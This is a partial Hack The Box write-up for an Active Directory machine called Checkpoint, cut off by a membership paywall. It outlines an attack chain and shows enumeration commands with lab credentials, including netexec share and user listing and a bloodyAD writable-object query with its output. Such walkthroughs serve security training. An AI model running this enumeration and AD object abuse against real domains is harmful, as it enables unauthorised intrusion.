Overview
Checkpoint is an Active Directory-focused Hack The Box machine that rewards careful enumeration, object abuse, and an understanding of how internal automation can become an execution path. The box begins with valid domain credentials and quickly expands into a chain involving writable deleted objects, a malicious VS Code extension, Kerberos delegation, DMSA abuse, and offline memory extraction from a VMware snapshot.
What makes this machine stand out is that no single exploit is enough on its own. Each phase exposes the next: AD permissions lead to share access, share access leads to code execution, code execution leads to Kerberos material, and that access eventually opens the path to privileged backup data and the final administrator hash.
Initial Reconnaissance
The first step was network discovery using RustScan against the target host.
rustscan -a 10.129.168.103 --ulimit 5000
The scan identified the box as a Windows domain controller and showed the standard AD port set, including DNS, Kerberos, LDAP, SMB, and WinRM-related services. This confirmed that the machine was built around an internal Windows domain rather than a public-facing application.
SMB Enumeration
With the provided credentials, SMB authentication succeeded immediately and confirmed the domain identity.
netexec smb checkpoint.htb -u alex.turner -p 'Checkpoint2024!' --shares
Output:
SMB 10.129.168.103 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:checkpoint.htb) (signing:True) (SMBv1:None)
SMB 10.129.168.103 445 DC01 [+] checkpoint.htb\alex.turner:Checkpoint2024!
SMB 10.129.168.103 445 DC01 [*] Enumerated shares
SMB 10.129.168.103 445 DC01 Share Permissions Remark
SMB 10.129.168.103 445 DC01 ----- ----------- ------
SMB 10.129.168.103 445 DC01 ADMIN$ Remote Admin
SMB 10.129.168.103 445 DC01 C$ Default share
SMB 10.129.168.103 445 DC01 DevDrop READ VS Code extensions share for approved .vsix packages compatible with VS Code engine 1.118.0
SMB 10.129.168.103 445 DC01 IPC$ READ Remote IPC
SMB 10.129.168.103 445 DC01 NETLOGON READ Logon server share
SMB 10.129.168.103 445 DC01 SYSVOL READ Logon server share
SMB 10.129.168.103 445 DC01 VMBackups
The standout finding was DevDrop, a writable-extension deployment share, and VMBackups, which later became relevant for privilege escalation.
Domain User Enumeration
Next, the domain users were enumerated.
netexec smb checkpoint.htb -u alex.turner -p 'Checkpoint2024!' --users
The results showed a normal enterprise user base, including ryan.brooks, svcdeploy, and mark.davies. Those accounts later became important because they fit into the access chain used to move through the environment.
Writable Object Discovery
The next step was to inspect writable AD objects.
bloodyAD --host 10.129.168.103 -d checkpoint.htb -u alex.turner -p 'Checkpoint2024!' get writable
Output:
distinguishedName: CN=Mark Davies,...,CN=Deleted Objects,DC=checkpoint,DC=htb permission: WRITE
distinguishedName: OU=Employees,DC=checkpoint,DC=htb permission: CREATECHILD
distinguishedName: CN=Alex Turner,OU=Employees,DC=checkpoint,DC=htb permission: WRITE
This was the first major pivot point. alex.turner had write permission over a deleted object for mark.davies, which meant the account could be restored.
🔐 PREMIUM WRITEUP - MEMBERSHIP REQUIRED
This machine is still active in HTB, so the full walkthrough, exploitation path, and flags cannot be publicly released.
But you can access the entire premium writeup right now.
🌟 Get Instant Access
Unlock the complete step-by-step solution, techniques used, notes, and exclusive insights by becoming a member.
Why Go Premium?
Early access to full detailed writeups
Passwords for active CTF solutions
Advanced exploitation techniques
Upgrade once - unlock everything instantly.
Keep hacking, keep learning, keep winning. 🎯
